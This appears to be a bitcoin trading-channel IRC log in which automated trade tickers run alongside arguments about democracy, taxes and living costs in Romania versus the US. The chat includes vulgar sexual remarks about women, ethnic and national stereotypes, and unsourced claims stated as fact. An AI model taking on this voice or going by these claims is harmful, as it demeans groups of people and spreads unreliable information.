;;calc 0.00070767 * 1000000000 * 69.81455 Mar 22 05:34:54 49405662.5985 Mar 22 05:34:56 fuck Mar 22 05:34:57 [HAVELOCK] [VTX] 23 @ 0.3909 = 8.9907 BTC [-] Mar 22 05:34:59 still under -.- Mar 22 05:35:00 [HAVELOCK] [VTX] 25 @ 0.3909 = 9.7725 BTC [-] Mar 22 05:35:20 [HAVELOCK] [VTX] 12 @ 0.3909 = 4.6908 BTC [-] Mar 22 05:35:27 haha Mar 22 05:35:29 damn dude Mar 22 05:35:54 [HAVELOCK] [VTX] 45 @ 0.3909 = 17.5905 BTC [-] Mar 22 05:35:59 dub this majority rule thing is no panacea Mar 22 05:36:10 democracy is when people vote for politicians who in turn vote, in accordance their constituancies wishes, on propsed pieces of legistaltion Mar 22 05:36:34 yeah. and the fate of democracy is for those politicians to observe that they can squander othe people's money. Mar 22 05:36:42 dub: that's a republic Mar 22 05:36:42 at which point the show ends. Mar 22 05:36:53 mircea_popescu: http://imgur.com/gallery/lrHmx Mar 22 05:37:17 i dig the skittles one Mar 22 05:37:32 [HAVELOCK] [VTX] 35 @ 0.3909 = 13.6815 BTC [-] Mar 22 05:37:47 [HAVELOCK] [VTX] 153 @ 0.3909 = 59.8077 BTC [-] Mar 22 05:38:03 smickles: maybe according to your schooling Mar 22 05:38:43 how strange, it also resembles what plato described Mar 22 05:39:03 traditionally the republic is the place where the laws prevail Mar 22 05:39:10 democracy is where the will of the mob prevails. Mar 22 05:39:24 pretty much everyone agrees democracy = disaster, as in, wrose than tyrrany Mar 22 05:39:27 how do laws get created Mar 22 05:39:31 with the unnotable exception of contemporary authors. Mar 22 05:39:43 dub they don't, basically. Mar 22 05:40:10 in the classical republic the laws were "always there". some mystical origin or whatever. Mar 22 05:40:31 convince the soldiers they came from the land Mar 22 05:40:40 the idea of a state without the power to legislate is quite appealing, actually. pretty much the onl;y way "the state" can work is if it can make no laws and raise no taxes. Mar 22 05:40:48 well I guess my outlook is more grounded in reality that whimsical language of philosophy Mar 22 05:41:06 dub another way to say this would be that your outlook is more grounded in fashion and ignorance than literacy. Mar 22 05:41:14 it wasn't whimsical to the authors of the constitution and the bill of rights. Mar 22 05:41:15 could be Mar 22 05:41:34 well the bill of rights is a bit of a joke Mar 22 05:41:41 to ~muricans anyway Mar 22 05:41:45 !muricans Mar 22 05:41:49 in the republic, the laws come from the senators Mar 22 05:42:29 the right to wholesale slaughter each other because you are scared fo the govt you elected Mar 22 05:42:30 smickles is an entire "law of men / law of gods" issue there Mar 22 05:42:36 city ordinances came from senators Mar 22 05:42:55 [HAVELOCK] [VTX] 103 @ 0.3909 = 40.2627 BTC [-] Mar 22 05:42:56 but nobody had the authority to ban smoking, or invent pedophilia as an offense Mar 22 05:43:11 [HAVELOCK] [VTX] 4 @ 0.3909 = 1.5636 BTC [-] Mar 22 05:43:28 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38439702 = 384.397 BTC [+] Mar 22 05:43:30 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35562479 = 355.6248 BTC [+] Mar 22 05:43:32 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.41316925 = 413.1693 BTC [+] Mar 22 05:43:36 mircea_popescu: the idea was to make the laws in accordance with what the gods wanted, which was decided upon by debate Mar 22 05:43:44 so in general if you have kids you don't want them getting fucked until they are old enough to decide who they want to fuck Mar 22 05:43:47 sounds like 'merica to me Mar 22 05:44:03 [HAVELOCK] [HIM] 1 @ 1.99 BTC [+] Mar 22 05:44:08 dub i didn't pick that example by accident. it was pretty much the largest civil issue in greece. Mar 22 05:44:17 unfortunately there are old people around that would liek to fuck your kids Mar 22 05:44:23 largely unresolved by the fall of athens Mar 22 05:44:31 so in order to protect your kids you propose a law against fucking them Mar 22 05:44:52 you gather support for this law and if enough people agree it becomes one Mar 22 05:44:55 towards the mid phase they had invented the habit of putting gold on the kid's necks Mar 22 05:45:03 as a show that if you fuck this one his daddy's prolly gonna have your arse. Mar 22 05:45:04 [HAVELOCK] [KCIM] 1 @ 1.22 BTC [+] Mar 22 05:45:11 kinda how that entire locket tradition got started. Mar 22 05:46:00 smickles reminded me of another hilarity of american constitution, that God started it all Mar 22 05:46:08 that's universal tho Mar 22 05:46:12 [HAVELOCK] [VTX] 1 @ 0.3914 BTC [+] Mar 22 05:46:18 [HAVELOCK] [VTX] 20 @ 0.3914 = 7.828 BTC [+] Mar 22 05:46:24 [HAVELOCK] [VTX] 20 @ 0.3914 = 7.828 BTC [+] Mar 22 05:46:52 its not Mar 22 05:47:04 man was given the burden of freedom Mar 22 05:47:12 nothing false about that Mar 22 05:47:24 what political system is not at some point claiming some metaphysical entrenchment ? Mar 22 05:47:32 your president talks about god giving you rights regularly, we lock people like this up Mar 22 05:47:45 because thats crazy talk Mar 22 05:47:51 i think this is largely a semantic issue. Mar 22 05:48:04 [HAVELOCK] [SDICE] 1 @ 0.46799999 BTC [+] Mar 22 05:48:05 your rights are god given hence natural Mar 22 05:48:11 they do not come from government or other men Mar 22 05:48:23 there's not much difference between claiming god gave you some right or you just have some right or you gave it yourself or whatever else. Mar 22 05:48:42 politicians here go to great lenghts to disguise any religious leaning as it would be political suicide Mar 22 05:48:50 there's never going to be a "proper" font of rights, and consequently any statement as to their origin is pretty much the same thing. Mar 22 05:48:56 dub first off most people never agree to a law Mar 22 05:48:58 aside from some marginal bottom feeders Mar 22 05:49:02 mircea_popescu: "Hello? This is dog. I'm stuck in 1935. Send help" http://i.imgur.com/apaveS3.jpg Mar 22 05:49:11 dub: where are you from? Mar 22 05:49:13 awww! Mar 22 05:49:50 [HAVELOCK] [VTX] 187 @ 0.3914 = 73.1918 BTC [+] Mar 22 05:49:52 [HAVELOCK] [VTX] 25 @ 0.3914 = 9.785 BTC [+] Mar 22 05:49:55 tiberiusiv: that is not important Mar 22 05:50:07 he's from like vassar or some shit. Mar 22 05:50:13 Well VTX is almost all gone already Mar 22 05:50:35 http://i.imgur.com/P7CFkG5.png Mar 22 05:50:40 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.41325384 = 413.2538 BTC [+] Mar 22 05:50:41 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38448574 = 384.4857 BTC [+] Mar 22 05:50:43 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35571763 = 355.7176 BTC [+] Mar 22 05:50:45 shame on Namworld trolling us with finance talk in this chan Mar 22 05:50:48 mircea: alot of idiot bitcoiners are dropping out from missallocating their BTCs Mar 22 05:50:59 tiberiusiv you quoting the girl ? :D Mar 22 05:51:03 into unpayable loan schemes, asics etc Mar 22 05:51:42 I'm watching VTX Mar 22 05:51:51 did you buy any ? Mar 22 05:52:35 A little bit. It's from my country so... I though I could support a bit. Not so many canadian bitcoiners yet. But fees on cavirtex are high. Mar 22 05:52:44 [HAVELOCK] [VTX] 3 @ 0.3914 = 1.1742 BTC [+] Mar 22 05:52:58 [HAVELOCK] [VTX] 20 @ 0.3914 = 7.828 BTC [+] Mar 22 05:53:08 I use cavirtex to buy/cash out BTC as needed. Mar 22 05:53:12 already Mar 22 05:53:13 [HAVELOCK] [VTX] 8 @ 0.3914 = 3.1312 BTC [+] Mar 22 05:53:27 a makes sense to own a little then Mar 22 05:53:31 namworld: cavirtex fees are comparable to anywhere else Mar 22 05:53:36 [HAVELOCK] [VTX] 12 @ 0.3914 = 4.6968 BTC [+] Mar 22 05:53:46 3%, vs MtGox 0.6% Mar 22 05:53:50 [HAVELOCK] [VTX] 63 @ 0.3914 = 24.6582 BTC [+] Mar 22 05:54:08 coinbase 1% I think... Mar 22 05:54:16 [HAVELOCK] [VTX] 3 @ 0.3914 = 1.1742 BTC [+] Mar 22 05:54:45 namworld: mtgox doesnt let you withdraw with bank drafts, email money, direct deposit Mar 22 05:54:47 well it's only 3% if you do 100 btc Mar 22 05:54:51 otherwise like .5 Mar 22 05:54:54 cavirtex can give you 30k in under 24hrs Mar 22 05:55:08 cavirtex is extremely fast in cashing out Mar 22 05:55:14 [HAVELOCK] [VTX] 71 @ 0.3914 = 27.7894 BTC [+] Mar 22 05:55:15 tiberiusiv in fairness, that's prolly because they're not much used so they don't opverrun their limits Mar 22 05:55:22 With discounts for very large volumes, it works down to as low as 0.5% but you have to trade 2500+ within the last 120 days Mar 22 05:55:31 mircea: there are no capital limits in canada Mar 22 05:55:51 that'll have to be verified in practice before i take it too seriously. Mar 22 05:55:51 I love Canada Mar 22 05:55:52 NO LIMIT Mar 22 05:56:17 anyway, it's quite clear that mtgox is dead by now. Mar 22 05:56:28 back when they were just bleeding market share it seemed like it's temporary Mar 22 05:56:30 mircea: canadian regulators tend to be 40 years behind anything Mar 22 05:56:42 That's true. Mar 22 05:56:42 but by now sealed deal. so probably the top 5 or top 10 stand to gain nicely. Mar 22 05:56:51 you realize canada is like the financial crime center of the world Mar 22 05:56:59 tiberiusiv russia is. Mar 22 05:57:04 [HAVELOCK] [VTX] 7 @ 0.3914 = 2.7398 BTC [+] Mar 22 05:57:10 i thought it was London Mar 22 05:57:12 I think Russia beats Canada, yeah Mar 22 05:57:18 100mil ponzi scheme is like 3 years prison in canada Mar 22 05:57:19 its life in russia Mar 22 05:57:24 no it's not. Mar 22 05:57:32 it's free police guards in russia. Mar 22 05:57:41 yes i guess that is true Mar 22 05:57:49 now on the other hand not payingyour taxes... Mar 22 05:57:58 they don;t like that. Mar 22 05:58:49 [HAVELOCK] [VTX] 3 @ 0.3914 = 1.1742 BTC [+] Mar 22 06:00:37 What's like making love in a canoe? Mar 22 06:00:51 russia taxes are low Mar 22 06:00:54 like 10% on income Mar 22 06:01:09 usa used to be like that Mar 22 06:01:19 now they just rape you over and over Mar 22 06:01:43 US was like 5% on ultra high net worths Mar 22 06:01:45 EVERYWHICH WAY FROM SUNDAY POSSIBLE Mar 22 06:01:53 and 0 in the golden age Mar 22 06:01:55 why don't you leave? Mar 22 06:02:02 tiberiusiv there's official + unopfficial Mar 22 06:02:06 you're better off paying the latter Mar 22 06:02:13 I know a few wealthy people who upped and GTFO Mar 22 06:02:20 mainly due to death tax Mar 22 06:02:24 leaving the US makes no sense for wealthy Mar 22 06:02:32 dub im paying something like 3.9% if you count it all. Mar 22 06:02:35 they have to renounce citizenship and pay an exit tax Mar 22 06:02:39 American beer, know why? Mar 22 06:02:42 well, im not in the category. im in the "unwashed masses" category, as mp calls it. Mar 22 06:02:51 american beer is terrible Mar 22 06:02:53 mod6 im sure you wash. Mar 22 06:02:56 ask anyone Mar 22 06:02:57 second off, where would a wealthy american really leave too? Mar 22 06:03:01 it's fucking close to water Mar 22 06:03:01 mircea_popescu: hehe, i do :) Mar 22 06:03:04 [HAVELOCK] [VTX] 2 @ 0.3949 = 0.7898 BTC [+] Mar 22 06:03:07 tiberiusiv romania. Mar 22 06:03:07 options are limited Mar 22 06:03:21 dude 80% of romania is a dump Mar 22 06:03:27 so ? Mar 22 06:03:38 well, who cares, maybe it wont be if they adopt btc Mar 22 06:03:38 80% of the us is a dump too, what criteria is this Mar 22 06:03:46 its dangerous to be a wealthy none native Mar 22 06:03:46 most of earth's surface is water, but i still like living here Mar 22 06:04:00 i want to die on mars secretly Mar 22 06:04:03 US has large diversity to pick from and same language Mar 22 06:04:09 tiberiusiv ya well being stupid and rich is dangerous everywhere. Mar 22 06:04:21 romania also has a high sales tax and income tax Mar 22 06:04:25 given the chance to live in shit conditions on mars, i would do it Mar 22 06:04:36 consumer goods are very expensive in RO compared to US Mar 22 06:04:55 are you serious ? Mar 22 06:05:07 yes. im talking about imported goods Mar 22 06:05:08 this may shock you, but I only have one television Mar 22 06:05:10 ... Mar 22 06:05:15 here i just saw a kid pay $3.50 for a can of altoids Mar 22 06:05:20 and its like 36" Mar 22 06:05:20 to get a good car in the us you have to ship it from yurp Mar 22 06:05:21 i nearly fell over Mar 22 06:05:23 it's about half price in romania Mar 22 06:05:31 not imports Mar 22 06:05:37 high end cars, electronics etc Mar 22 06:05:41 are not half price in romania Mar 22 06:05:52 china is closer to romania than to the us you know Mar 22 06:05:55 theres a 23% consumption tax alone Mar 22 06:06:10 that means nothing, romania doesnt even have a developed transport network to move goods around Mar 22 06:06:12 there's vat, but you apply it on lower basis and get much better stuff for your money. Mar 22 06:06:21 you realize german cars are cheaper in the US then in germany? Mar 22 06:06:27 you're approaching the problems of infrastructure as if you're a salaried peon. Mar 22 06:06:32 i thought we were discussing the ultrarich here. Mar 22 06:06:48 ultrarich live great in the US Mar 22 06:06:55 tiberiusiv yes, they're cheaper inasmuch as they're made in jersey, and thus only german by name. Mar 22 06:06:58 gated off islands, huge estates in cali Mar 22 06:07:18 [HAVELOCK] [VTX] 7 @ 0.3949 = 2.7643 BTC [+] Mar 22 06:07:33 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.41384528 = 413.8453 BTC [+] Mar 22 06:07:40 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38510602 = 385.106 BTC [+] Mar 22 06:07:42 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35636677 = 356.3668 BTC [+] Mar 22 06:07:50 [MPEX] [S.MPOE] 4214 @ 0.00072101 = 3.0383 BTC [-] Mar 22 06:07:51 [MPEX] [S.MPOE] 3750 @ 0.00072032 = 2.7012 BTC [-] Mar 22 06:07:55 if you think a gated off island is a great way to live i guess we see things too differently to discuss this productively. Mar 22 06:07:56 [MPEX] [S.MPOE] 5754 @ 0.0007046 = 4.0543 BTC [-] Mar 22 06:08:02 you can safely drive around a ferrari in 70% of the US Mar 22 06:08:03 ^ Mar 22 06:08:06 the same is not true for romania Mar 22 06:08:14 how would you know that ?! Mar 22 06:08:23 my friends from there Mar 22 06:08:25 movies Mar 22 06:08:29 they may be talking a lot of shit. Mar 22 06:08:29 thats how i knew about your city Mar 22 06:08:30 [HAVELOCK] [VTX] 33 @ 0.3949 = 13.0317 BTC [+] Mar 22 06:08:42 timisoara is a wealthy region for romania Mar 22 06:08:46 yeah. Mar 22 06:08:54 its more sophisticated too Mar 22 06:09:00 or so they like to think Mar 22 06:09:04 the rest of the place has high levels of poverty Mar 22 06:09:06 not really the case, but anyway Mar 22 06:09:12 so does detroit. wtf. Mar 22 06:09:37 mircea: an ultra rich american has no real incentive to leave the US Mar 22 06:09:41 on one hand you're telling me about these elusive cali estates (0.001% of us) Mar 22 06:09:56 [HAVELOCK] [VTX] 16 @ 0.3949 = 6.3184 BTC [+] Mar 22 06:09:57 on the other hand you impugn imaginary problems with romania on the grounds that it's not all level Mar 22 06:10:03 tiberiusiv yes, he does. Mar 22 06:10:13 mircea: tell me what the ultra rich is gaining leaving the US? Mar 22 06:10:15 or else all the ones i know dropping it since 2005 or so are silly. Mar 22 06:10:17 tiberius has hard set views about how people lives in various place of the world and living costs. Mar 22 06:10:23 tiberiusiv: there are lots of super rich people here who renounce their citizenship and leave for a tax-haven like the bahamas or whatever. Mar 22 06:10:36 dude bahamas you cannot own GOODS Mar 22 06:10:40 they have duties of like 500% Mar 22 06:10:43 tiberiusiv the problem with the us is that it contains ~200mn unskilled, hungry, entitled doods. Mar 22 06:10:49 you don't want to be aroundwhen shtf. Mar 22 06:10:52 an interesting thing about americans is how few of them travel Mar 22 06:11:02 [HAVELOCK] [VTX] 33 @ 0.3949 = 13.0317 BTC [+] Mar 22 06:11:27 mod6: renouncing your citizenship to sit in the bahmas only makes sense if 100% of your income comes from capital gains Mar 22 06:11:32 let me put it in the following perspective : american guy making 1300 usd a month (mostly govt aid, he doesn't work for it) is sitting around listening to angry music and glaring at passerbys because "he's been cheated". Mar 22 06:11:41 dividend income is still withheld from 99% of countries by up to 30% Mar 22 06:11:50 tiberiusiv: maybe the bahamas was a bad example. im not rich enough to know better really. Mar 22 06:11:53 i couldn't care less. Mar 22 06:11:56 romanian guy making ~500 usd a month is going out and fixing the park benches in his spare time with his own tools. Mar 22 06:12:26 nobody rich wants to hang around with idiots. Mar 22 06:12:28 that's the incentive. Mar 22 06:12:32 micrea: romanian government is too poor to run an effective welfare state Mar 22 06:12:38 they dont in the US Mar 22 06:12:44 thats why they all live in guarded and secluded areas Mar 22 06:12:48 right. seclusion sucks. Mar 22 06:12:54 the ultra rich dont mingle with the commoners lol Mar 22 06:13:06 better off move to somewhere where the idiots are still kept at a low roar by the traditional means of stepping on head. Mar 22 06:13:33 listen youd need to hire an army of security personal in romania Mar 22 06:13:46 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.41384528 = 413.8453 BTC [+] Mar 22 06:13:48 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38510602 = 385.106 BTC [+] Mar 22 06:13:48 theres a reason romanians have a bad reputation throughout the EU Mar 22 06:13:52 it's funny, cause i'm over here and you're over there. Mar 22 06:13:53 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.35636677 = 356.3668 BTC [+] Mar 22 06:13:57 [HAVELOCK] [VTX] 1 @ 0.3949 BTC [+] Mar 22 06:14:04 yet you're definitively telling me shit ?! Mar 22 06:14:05 if anyone got a whiff of your wealth youd kidnapped Mar 22 06:14:14 mircea: you can blend in Mar 22 06:14:15 sigh. Mar 22 06:14:20 you are a native speaker Mar 22 06:14:29 listen, there's plenty of rich people. everybody knows. Mar 22 06:14:38 there hasn't been a kidnapping in romania since i dunno, years ago. Mar 22 06:14:39 yes romanians Mar 22 06:14:46 no dude. italians, germans Mar 22 06:14:50 take your pick. Mar 22 06:14:52 hardened by 70 years of communism and system manipulation Mar 22 06:14:58 that nobody fucks with Mar 22 06:15:03 [HAVELOCK] [SDICE] 1 @ 0.4679999 BTC [-] Mar 22 06:15:13 i think you're basically caught in a novel Mar 22 06:15:24 face it mircea, your country sucks Mar 22 06:15:28 lol Mar 22 06:15:29 you still didnt tell me any incentive that romania offers Mar 22 06:15:34 it sucks, but not for the reasons he thinks Mar 22 06:15:44 why would i move to a place that charges me 23% to buy products? Mar 22 06:15:46 i told you about a dozen, but somehow it doesn't stick. Mar 22 06:15:59 because you'd rather pay 1.23 dollars for a pound of excellent cheese Mar 22 06:16:03 it sucks because he's alienated and alone Mar 22 06:16:04 so i pay a 23% premium to watch a poor guy paint a park bench Mar 22 06:16:05 no peers Mar 22 06:16:06 than 6.50 for a pound of whatever you have there. Mar 22 06:16:16 all he has a re hot women Mar 22 06:16:23 and it is so boring Mar 22 06:16:24 yes but a car costs 50% more Mar 22 06:16:28 nope. Mar 22 06:16:29 wat Mar 22 06:16:34 a car actually costs ~30% less. Mar 22 06:16:37 mircea: compare new car prices Mar 22 06:16:42 (than europe. prolly 50% less than the us) Mar 22 06:16:43 what the dacia? lol Mar 22 06:16:52 dude that is pure bs Mar 22 06:17:17 next he's gonna tell me that a limited series lamborghini costs the same everywhere ;/ Mar 22 06:17:47 http://www.mercedes-benz.ro/content/romania/mpc/mpc_romania_website/rong/home_mpc/passengercars/home/new_cars/models/e-class/_w212/configurator/configurator.html?tp_ccci=/dsc_ro/globalsessionid/DSC_ro3E2D3232336E3B7BFF333A6301020900/dsc_locale/ro_RO/appId/DSC_ro/siteLocale/ro_RO/P3501ViewBean.jam1%3bjsessionid=0000iBB1YEY0PeDNC29nXrqoZkJ:16pcreqrr#_int_passengercars:home:model-navi:configurator Mar 22 06:18:05 E350 gasoline is 55400 euros in romania Mar 22 06:18:35 [HAVELOCK] [VTX] 7 @ 0.3976 = 2.7832 BTC [+] Mar 22 06:19:02 in the united states its 51k USD Mar 22 06:19:26 who pays list price for a car? Mar 22 06:19:26 25k price difference Mar 22 06:19:28 [HAVELOCK] [VTX] 8 @ 0.3976 = 3.1808 BTC [+] Mar 22 06:19:29 add even average US sales tax of 6% Mar 22 06:19:43 http://mercedes.anunturi-auto.4tuning.ro/anunturi-auto/masini-second/mercedes-e-220-impecabila-11871957.html Mar 22 06:19:45 [HAVELOCK] [VTX] 1 @ 0.3976 BTC [+] Mar 22 06:19:45 6k euros. Mar 22 06:19:49 the US is the cheapest consumer good market in the world Mar 22 06:19:55 thats the benefit of reserve status Mar 22 06:19:59 look, you wanna believe that, believe that. Mar 22 06:20:10 i've been there, i've been here, itdoesn't figure like you think. Mar 22 06:20:20 dude they dont even sell the 220 in the US Mar 22 06:20:28 [BTCTC] [PAJKA.BOND] 1 @ 0.1099 BTC [+] Mar 22 06:20:29 thats like what taxis drive in europe Mar 22 06:20:35 yeah... Mar 22 06:20:43 6k euros for a high mileage old benz? Mar 22 06:20:50 BASE model? Mar 22 06:20:58 [BTCTC] [ASICMINER-PT] 97 @ 0.85888 = 83.3114 BTC [+] Mar 22 06:21:12 you've successfuly railroaded this discussion into perhaps the most irrelevant possible corner. Mar 22 06:21:13 which you have to pay romanian road tax on Mar 22 06:21:14 [BTCTC] [ASICMINER-PT] 20 @ 0.85889 = 17.1778 BTC [+] Mar 22 06:21:17 if your engine is too large Mar 22 06:21:26 twss Mar 22 06:21:37 romania is cheaper only for basic staples Mar 22 06:21:38 [HAVELOCK] [VTX] 3 @ 0.3976 = 1.1928 BTC [+] Mar 22 06:21:41 [BTCTC] [ASICMINER-PT] 20 @ 0.85896 = 17.1792 BTC [+] Mar 22 06:21:42 ie rent, groceries Mar 22 06:21:48 romania is cheaper for everything that matters, pretty much. Mar 22 06:21:56 considering the average salary is 1/15th of the US Mar 22 06:22:04 as in, you couldn't replicate what counts as a "normal" diet here in the us without 10k a month Mar 22 06:22:21 well i agree to that Mar 22 06:22:29 healthy food in north america is expensive Mar 22 06:22:29 i happen top not care what cars cost mostly because i hire a driver with his car and gas for ~100 bux per day or some shit Mar 22 06:22:38 i can keep three on call and not even notice it particularly. Mar 22 06:22:54 100 per day im driving a ferrari in the US Mar 22 06:22:59 im not driving. Mar 22 06:23:00 no way Mar 22 06:23:03 considering the monthly payments are 2500 Mar 22 06:23:05 he's driving. Mar 22 06:23:12 not even a rental with the insurance Mar 22 06:23:22 and waits for me and carries my bags and whatever the fuck else. Mar 22 06:23:25 mod6: you can finance a ferrari in the US for 2-3k a month Mar 22 06:23:28 basically you get a motorized butler. Mar 22 06:23:41 what car is he showing up in? Mar 22 06:24:05 i dunno, whatever. you can actually demand a specific make, but i never cared. Mar 22 06:24:06 wow. what a waste of money those high end cars are. Mar 22 06:24:23 you know you can rent a brand new car in the US Mar 22 06:24:27 for $20 a day Mar 22 06:24:30 yes. Mar 22 06:24:33 how much for the driver ? Mar 22 06:24:35 and easily hire a driver for $60 Mar 22 06:24:41 bahaha Mar 22 06:24:43 a day ? Mar 22 06:24:43 provided you give him the car Mar 22 06:24:54 yes Mar 22 06:25:05 less than ten dollars an hour Mar 22 06:25:10 i think what happens here is that you're comparing things wrongly in the following sense : Mar 22 06:25:12 for professional service Mar 22 06:25:19 100 a day is alot Mar 22 06:25:21 you are *out of your mind* Mar 22 06:25:22 you probably get some deals over there and you take that as a basis. which isn't a basis. Mar 22 06:25:30 then you imagine stuff here is book price, which it isn't. Mar 22 06:25:38 this somehow comes out like it's 0.35% more here than there. Mar 22 06:25:43 well... not the facts on the ground, no. Mar 22 06:25:54 imported products(quality luxury items) are more expensive in RO then US Mar 22 06:25:58 theres no comparison Mar 22 06:26:05 i mean sure, while i was in ny i had free car service and two doods with shotguns Mar 22 06:26:06 staples are agreeably cheaper Mar 22 06:26:11 i didn't pay a cent, but that doesn't mean ny is free. Mar 22 06:26:39 what about access to weapons? Mar 22 06:26:48 what about it ? Mar 22 06:27:00 with a drivers license i can be armed to the teeth in 1 day Mar 22 06:27:11 yeah, and be shot by next morning. Mar 22 06:27:15 in about 30% of the states Mar 22 06:27:17 [HAVELOCK] [VTX] 2 @ 0.3976 = 0.7952 BTC [+] Mar 22 06:27:27 in romania you'd take about a week to find someone with a working firearm. Mar 22 06:27:41 the police don't get live rounds, they just carry the empty pistols around. Mar 22 06:27:44 lol Mar 22 06:27:54 fuck off? Mar 22 06:27:58 lol, thats almost as good as the japaneese police with their whistles. Mar 22 06:28:03 i am serious. Mar 22 06:28:05 [MPEX] [O.BTCUSD.C410T] 1000 @ 0.41401404 = 414.014 BTC [+] Mar 22 06:28:06 [MPEX] [O.BTCUSD.C430T] 1000 @ 0.38528302 = 385.283 BTC [+] Mar 22 06:28:08 [MPEX] [O.BTCUSD.C450T] 1000 @ 0.356552 = 356.552 BTC [+] Mar 22 06:28:12 i agree US police are bad Mar 22 06:28:18 kill you over speeding Mar 22 06:28:19 DONT MAKE ME HIT YOU WITH THIS! Mar 22 06:28:22 hahah Mar 22 06:28:37 mod6 about a decade ago in the cluj airport i confiscated a chick's weapon Mar 22 06:28:40 cause she was an idiot. Mar 22 06:28:53 (they had just introduced females into the force at the time) Mar 22 06:29:03 her boss was pissed (at her) Mar 22 06:29:09 is the VTX ipo below offer price? Mar 22 06:29:39 they run a strange dual book thing. Mar 22 06:29:48 you gotta specifically buy from the ipo book Mar 22 06:30:20 so you just were like, "you're not doing it right..." and just disarmed her? Mar 22 06:30:21 cavirtex cashouts are extremely fast Mar 22 06:30:42 mod6 she was not protecting her backside. i just went behind her, waited for like five seconds, then took her unsecured gun Mar 22 06:30:44 yeah, I like cavirtex Mar 22 06:30:45 off her hip Mar 22 06:30:51 LOL Mar 22 06:30:53 yeah Mar 22 06:30:54 bravo Mar 22 06:31:02 no wonder the the CO was pissed Mar 22 06:31:02 Share price: $30 CAD = 0.64 BTC5 Mar 22 06:31:07 ipo is at 0.39? Mar 22 06:31:07 i was like wtf you numnuts, what if this was loaded and i wiped the floor with the lot of you nao Mar 22 06:31:37 mod6 actually let me see if i can find this Mar 22 06:32:39 mod6 http://stirileprotv.ro/stiri/actualitate/video-incidente-inainte-de-meciul-steaua-dinamo-jandarmii-au-intervenit-in-forta.html Mar 22 06:32:44 they lose the damned things all the time Mar 22 06:32:45 nice Mar 22 06:32:54 mircea: ultra rich americans tend to be either WASPs or jewish, and neither group likes to be around people much Mar 22 06:33:05 title is "that awkward moment when a police guy loses his gun while handling arrests" Mar 22 06:33:17 [HAVELOCK] [VTX] 10 @ 0.3973 = 3.973 BTC [-] Mar 22 06:33:21 tiberiusiv yeah well... i like being around people. Mar 22 06:33:26 hence why they build their boarded up enclaves Mar 22 06:33:34 it's an unsanitary way of life. Mar 22 06:33:43 it is strange Mar 22 06:33:48 [HAVELOCK] [VTX] 99 @ 0.3973 = 39.3327 BTC [-] Mar 22 06:34:05 i mean... basically they're in prison. fuck that. Mar 22 06:34:15 self imposed exile Mar 22 06:34:26 i'll go to anywhere i want and strike up a chat with anyone i want. pick up a street walker if i feel like it and go watch the game with her. Mar 22 06:34:26 spend most of their days worrying about losing the wealth Mar 22 06:34:40 no way to live. Mar 22 06:34:49 lol that is never occuring in north america Mar 22 06:34:53 yes well... Mar 22 06:35:00 youd be arrested Mar 22 06:35:10 i'll tell you, part of what i did in the us was this cross country by bus thing Mar 22 06:35:15 let me find this article Mar 22 06:35:20 cause it's a funny story. Mar 22 06:35:48 americans are approachable but its mostly a business type relationship Mar 22 06:36:07 http://trilema.com/2011/are-you-a-muslim/ Mar 22 06:36:17 it's in romanian, if gt fails horribly i guess i'll have to translate it myself. Mar 22 06:36:57 i'll say american area approachable, go up to one on thier porch with a smile and a friendly greeting in the dark of night, 3/5 times i get a beer doing that Mar 22 06:37:03 youd be arrested << what i did earlier today was take a chick along for a nude stroll down the riverwalk. Mar 22 06:37:07 *americans are Mar 22 06:37:21 did he try to sell any idiot being able to arm themselves to the teeth instantaneously as a good thing? Mar 22 06:38:50 (21:34) < mircea_popescu> i'll go to anywhere i want and strike up a chat with anyone i want. pick up a street walker if i feel like it and go watch the game with her. << the sign of a true travel bug Mar 22 06:39:07 its awesome to go new places and just chat up random people Mar 22 06:39:37 mod6 when i landed in costa rica i didn't speak spanish. Mar 22 06:39:55 i went to the local uni, found the english dept, picked up a chick wirth nice hooters Mar 22 06:40:06 she got me an apt (for reasonable rent, causer it helps if you're local obviously) Mar 22 06:40:35 nice :) Mar 22 06:40:50 its a good way to learn the lang and exp the culture.. just immerse yourself. Mar 22 06:40:51 so is havelock a legit exchange? Mar 22 06:41:03 chick with nice hooters eh.. sounds like a fatty Mar 22 06:41:23 dub she was a little heavy in the rump ya Mar 22 06:41:23 on the deposit bitcoins page i see nothing? Mar 22 06:41:27 is it my browser Mar 22 06:41:29 have you seen spanish chicks? some of em got a nice rack of titty and are totally thin Mar 22 06:41:36 tiberiusiv nobody's come forth with proof otherwise so far. Mar 22 06:41:47 mod6 this one was well rounded. Mar 22 06:42:00 they come in all shapes and sizes i guess. Mar 22 06:42:02 [HAVELOCK] [VTX] 7 @ 0.3973 = 2.7811 BTC [-] Mar 22 06:42:20 i learned a lot of my spanish in mexico just traveling around. Mar 22 06:42:27 then i kinda took it more formally later on. Mar 22 06:42:48 spanish chicks, ew Mar 22 06:42:59 but travel is amazing, and all the americans who are too fat or busy watching the kardashians to go out and check out the rest of the planet are dumb. Mar 22 06:43:00 dub y so picky mang ? Mar 22 06:43:05 well spain in general is ew Mar 22 06:44:24 I remember a chick in business attire squatting down and taking a dump in the gutter Mar 22 06:44:34 downtown bilbao Mar 22 06:44:50 [HAVELOCK] [VTX] 5 @ 0.3973 = 1.9865 BTC [-] Mar 22 06:44:52 [HAVELOCK] [VTX] 2 @ 0.3973 = 0.7946 BTC [-] Mar 22 06:45:06 lol dub Mar 22 06:45:51 also getting boils from swimming in the sea Mar 22 06:46:00 clearly spain is therefore broken. Mar 22 06:46:33 but for my curiosity : naked teensy chick next to you was covered in her own vomit six hours ago at what they call "a party". Mar 22 06:46:43 is she unfuckable now even tho she's showered since ? Mar 22 06:46:55 mircea_popescu: http://i.imgur.com/oaJhsoO.jpg Mar 22 06:47:08 ahahah Mar 22 06:47:22 dude it was nothing like that, it was more like slapping her butt Mar 22 06:47:32 nice smickles Mar 22 06:47:47 lol slapped her ass and grabbed her gat Mar 22 06:49:24 anyway. romania is just not a very weapon centric culture. i have 